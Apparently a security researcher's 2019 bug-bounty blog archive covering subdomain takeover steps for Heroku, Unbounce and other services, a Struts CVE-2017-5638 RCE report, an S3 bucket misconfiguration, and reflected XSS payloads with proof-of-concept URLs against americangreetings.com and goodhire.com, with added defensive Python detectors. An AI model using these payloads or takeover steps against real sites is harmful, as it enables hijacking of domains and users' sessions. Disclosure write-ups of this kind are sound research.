Jun 11, 2019

Can I takeover XYZ ( Steps )

Based on the can-i-take-over-xyz list.

_______________________________________________________________________

Service : Heroku
Fingerprint : No such app

There are two types of takeover for this service:
1) HerokuDNS ( edge case )
2) Herokuapp

Steps to takeover :
Please note : this edge-case takeover ( HerokuDNS ) applies when the DNS of the website is an IP address belonging to Heroku.
The Herokuapp takeover follows the same steps, but the DNS of the domain or subdomain is a CNAME such as haronapplication.herokuapp.com, so you only need to create a new app called haronapplication.




_____________________________________________________________________

Service : Wufoo
Fingerprint : Profile not found.
Steps :
The subdomain CNAME will look like
haronsurvey.wufoo.com
and the full steps are here


__________________________________________________________________________

Service : Unbounce
Fingerprint : The requested URL was not found on this server.

Takeover steps :
Still possible for old clients.
Steps here

_____________________________________________________________________________

Service : HubSpot
Fingerprint : Domain not found.
Takeover steps :
Possible.
Will be added soon.

Info here

____________________________________________________________________________

Service : Shopify
Fingerprint : Sorry, this shop is currently unavailable.


Takeover steps :
here

________________________________________________________________________

Service : Campaign Monitor
Fingerprint : Trying to access your account?

Takeover steps :

__________________________________________________________________________

Service : Fastly
Fingerprint : Fastly error: unknown domain

Takeover steps :
Create your Fastly account for free and do the steps shown in the video.




                                           

___________________________________________________________________________





Apr 13, 2019

[ Special Case ] HerokuDNS is still vulnerable to subdomain takeovers ( Live PoC )




Today I will share a new finding about
subdomain takeovers
via HerokuDNS
[ Edge Case ]

Many blogs say you can't take over from HerokuDNS any more
because they now use a random CNAME generator.

In this blog I will explain how I could take over this domain
and add it to my custom domains list on my Heroku dashboard.
-----------------------------------------------
Explained
simply:
1) If you see this picture,
which shows " No Such App " in the title


2) Now go and look at the DNS of the subdomain.
If you find it like this ( IPs )

3) You can add it directly to your Heroku account, to any app, as a custom domain.
Yes, when you add it you will get a random CNAME, like what happened when I added dns-scratch.me to my account.



4) The domain or subdomain is now connected.
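An added example, not code from these posts or from any of the providers named, that turns the fingerprint list in the "Can I takeover XYZ" post and the HerokuDNS edge case above into a check a defender runs over their own zone: given each subdomain's DNS target and the page it serves, it reports which names are dangling. The CNAME suffixes, sample records and response bodies are constructed for this example.

```python
# Added example, not code from the original posts or from any provider.
# Classifies a subdomain from (CNAME target, response body) using the
# fingerprints the "Can I takeover XYZ" post lists, plus the HerokuDNS edge
# case: no CNAME, only an A record to a Heroku IP, and a "No such app" page.
# The records and bodies used in the test are constructed, not real.

FINGERPRINTS = {  # service -> error text the post lists for it
    "Heroku": "No such app",
    "Wufoo": "Profile not found",
    "Unbounce": "The requested URL was not found on this server",
    "HubSpot": "Domain not found",
    "Shopify": "Sorry, this shop is currently unavailable",
    "Campaign Monitor": "Trying to access your account?",
    "Fastly": "Fastly error: unknown domain",
}
CNAME_SUFFIXES = {  # provider CNAME targets the posts mention
    "herokuapp.com": "Heroku",
    "herokudns.com": "Heroku",
    "wufoo.com": "Wufoo",
    "unbouncepages.com": "Unbounce",
}

def provider_for(cname):
    """Map a CNAME target to a known provider, or None."""
    if not cname:
        return None
    target = cname.rstrip(".").lower()
    for suffix, service in CNAME_SUFFIXES.items():
        if target == suffix or target.endswith("." + suffix):
            return service
    return None

def classify(cname, body):
    """Return (service, verdict). cname is None when the name resolves
    straight to an A record; body is the HTTP response the name serves."""
    text = body.lower()
    matched = [s for s, fp in FINGERPRINTS.items() if fp.lower() in text]
    provider = provider_for(cname)
    if provider:
        if provider in matched:
            return provider, "dangling: CNAME to provider and fingerprint present"
        return provider, "in use: CNAME to provider, no fingerprint"
    if not matched:
        return None, "ok"
    if cname is None and "Heroku" in matched:
        # The edge case from the post above: an A record, not a CNAME, yet
        # the name can still be attached to an app as a custom domain.
        return "Heroku", "dangling: A record with Heroku fingerprint (edge case)"
    return matched[0], "review: fingerprint present, CNAME target not recognised"
```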



---------------------------------------------------------

Apr 12, 2019

[RCE] Remote code execution at api.PrivateProgram.com (CVE-2017-5638)





Apache Struts CVE-2017-5638
Remote Code Execution Vulnerability
Program : Private on HackerOne
Bounty : $2000 and a $250 bonus
Subdomain : Api.Private.com


Today I will post my new find:
remote code execution
in the API subdomain of a private program,
which was using a vulnerable version of Apache Struts
(CVE-2017-5638)

CVE-2017-5638 description :
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
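An added example, not from the original post and not part of Apache Struts, showing the detection side of the description above: a scan over web-server log lines that flags requests whose Content-Type header carries an OGNL expression or the "#cmd=" marker the CVE text cites. The key=value log format and the sample lines are constructed.

```python
# Added example, not code from the original post or from Apache Struts.
# Flags requests whose Content-Type header carries an OGNL expression, the
# delivery vector the CVE-2017-5638 description names. The log lines and
# their key=value format are constructed for this example.
import re

# %{...} / ${...} expression delimiters, or the "#cmd=" marker the CVE text
# cites. A legitimate multipart/form-data Content-Type never contains these.
OGNL_MARKERS = re.compile(r"[%$]\{|#cmd=", re.IGNORECASE)

def is_suspicious_content_type(value):
    """True when a Content-Type header value looks like an OGNL injection."""
    return bool(OGNL_MARKERS.search(value))

def scan_log(lines):
    """Return (line_number, content_type) for each suspicious request.
    Assumes one request per line with a quoted content_type="..." field."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'content_type="([^"]*)"', line)
        if m and is_suspicious_content_type(m.group(1)):
            hits.append((n, m.group(1)))
    return hits

SAMPLE_LOG = [  # constructed; the second line is the kind of request to alert on
    'src=203.0.113.5 method=POST path=/upload content_type="multipart/form-data; boundary=----abc" status=200',
    'src=198.51.100.9 method=POST path=/upload content_type="%{#cmd=\'REDACTED\'}" status=500',
    'src=203.0.113.7 method=GET path=/ content_type="" status=200',
    'src=198.51.100.4 method=POST path=/api content_type="application/json" status=200',
]

if __name__ == "__main__":
    for n, ct in scan_log(SAMPLE_LOG):
        print(f"line {n}: suspicious Content-Type {ct!r}")
```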

PoC was :


References : 





----------------------------------------------------------

Mar 19, 2019

Feb 26, 2019

[Still works] Redirect from Yahoo Subdomain, Reflected XSS on americangreetings.com






Bug Type : Reflected XSS
Affected Site : americangreetings.com 
Yahoo Subdomain : greetings.yahoo.com


Description
I've reported this to Yahoo and Greetings, but it was marked as informative,
so they don't mind disclosing it.

This XSS still works.

I've found that the Yahoo subdomain greetings.yahoo.com can be redirected to any path on americangreetings.com.

So I tried to get a reflected XSS on americangreetings.com in its paths.

The XSS affected this path:
/search-results/{xss payload}

************************************
The suggested fix to Yahoo was
to make it like
greetings.yahoo.ca,
which redirects only to the site home.

***************************************

PoC links :

http://greetings.yahoo.com/search-results/'"--><Details Open OnToggle=confirm`Haron`>

https://www.americangreetings.com/search-results/'%22--%3e%3cDetails%20Open%20OnToggle=confirm%60Haron%60%3e


*************************************


Feb 22, 2019

AWS s3 Buckets Create





Amazon AWS S3 buckets are simple and can be created by anyone.

************************
Steps to create an S3 bucket

1) You must create an Amazon AWS account first ( requires a credit card ).
They ask for your payment information so they can verify your identity. They will not charge you unless your usage exceeds the AWS Free Tier limits.


2) Creating a bucket is simple, as you see in the picture.

3) Enter your bucket name.
I've chosen HaronBucket.
Please remember this will be your bucket link,
for example, as with mine:
haronbucket.s3.amazonaws.com
s3.amazonaws.com/haronbucket


Click Next, then Next again if you don't need a special config or permissions.



After clicking Create Bucket,
your bucket will be shown in the Buckets home.


**********************************
Now uploading your files is very easy
1) Go to your buckets home.
2) Choose the bucket you want to upload files to,
or go to this link ( add your bucket ):
https://s3.console.aws.amazon.com/s3/buckets/your-bucket/


3) Click on Get Started and choose the files you want to upload :) then click Upload.

4) Your uploaded file will be shown in your bucket's home files; click on the file you uploaded.




5) Click on Make Public and scroll down; you will see your file's public link.


Subdomain Misconfiguration leads to AWS S3 Bucket Reader




Bug Type : Subdomain misconfiguration
Program : Private on HackerOne
Severity : P2 ( High )
Bounty : $600 + $200 bonus
Subdomain : images.example.com

************************************
How I found this bug
It was simple: when I went directly to https://images.example.com I found it redirected to https://aws.amazon.com/s3/

So then I started to look for the CNAME, and it was
images.example.com  >  s3.amazon.com

Here was the bug; I have seen many companies make the same error.
Developers must add a whitelist of S3 buckets.

So now I can call any bucket on images.example.com

example : images.example.com/haron-bucket/




************************
Steps to find this error are very simple:
if the subdomain has the alias s3.amazonaws.com,
try to add your bucket directly to the subdomain,
example : subdomain.site.com/yourbucket/yourfile.html
If it loads, this is vulnerable; if not, this means the developers added a bucket whitelist.
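An added example, not the program's or AWS's code, showing in Python what the post asks developers to add: the pass-through rewrite behind this bug beside a rewrite that only forwards requests for whitelisted buckets. The S3 origin, bucket names and paths are assumptions constructed for the example.

```python
# Added example, not the program's or AWS's code: the pass-through rewrite
# that lets any bucket be read through images.example.com, next to the
# whitelisted rewrite the post asks developers to add. Bucket names below
# are constructed placeholders.
from urllib.parse import unquote, urlsplit

S3_ORIGIN = "https://s3.amazonaws.com"

def rewrite_passthrough(path):
    """Vulnerable: forwards whatever path the client sent, so
    /haron-bucket/file.html reads someone else's bucket through the host."""
    return S3_ORIGIN + path

ALLOWED_BUCKETS = {"example-images-prod", "example-images-static"}  # constructed

def rewrite_allowlisted(path, allowed=ALLOWED_BUCKETS):
    """Hardened: only forwards when the first path segment names an approved
    bucket and an object key follows; returns None (serve 404) otherwise."""
    # Drop query/fragment, split on "/", then decode each segment so an
    # encoded bucket name cannot slip past the comparison.
    parts = [unquote(p) for p in urlsplit(path).path.split("/") if p]
    if len(parts) < 2:
        return None  # bare "/" or a bucket with no key (would list the bucket)
    bucket, key = parts[0], "/".join(parts[1:])
    if bucket not in allowed:
        return None
    return f"{S3_ORIGIN}/{bucket}/{key}"
```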

******************************************


Please see this write-up for creating your bucket:
https://www.mohamedharon.com/2019/02/aws-s3-buckets-create.html




*********************************************************


Feb 18, 2019

2 Subdomain Takeovers via Unbounce in a Private Program









Many researchers asked me whether this takeover still exists or is fixed.
Yes, this takeover still exists, with 3 scenarios,
as Akita Zen said.


*****************************
Bug Type : Subdomain Takeover
Service : Unbounce
Severity : Critical
Program : Private on HackerOne
Status : Duplicate after fixing it

*************************
In a private program on HackerOne I found 2 subdomains,
get.example.com
try.example.com
which had a CNAME pointing to unbouncepages.com
and showed me the takeover error ( fingerprint ).
So I made an account and tried to add the domain to my page on Unbounce, and it connected successfully.


Steps to takeover
1) Create an account on Unbounce with a credit card.
2) Create your Unbounce page.
3) Add a domain to your page.
If it tells you the domain is already taken, this means there is no takeover.
example : info.hacker.one
It shows us the takeover fingerprint, but it already works and is added to another account, so there is no takeover in it.




Timeline
Reported : 6 Nov, 2018
Triaged : 7 Nov, 2018
I noticed that they fixed it : 7 Nov, 2018, after 2 hours
Duplicate : 10 Nov, 2018


******************************

Feb 17, 2019

Reflected XSS in GoodHire.com CMS






Program : Inflection
Bug Type : Reflected XSS
Severity : High
Domain : GoodHire.com
Bounty : $0 + $150 bonus

******************************
The affected parameter was in the HubSpot CMS:
referrerUrl
Affected path:
/_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
PoC was :
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


***********************************
For more about this bug, please see my write-up.






****************************************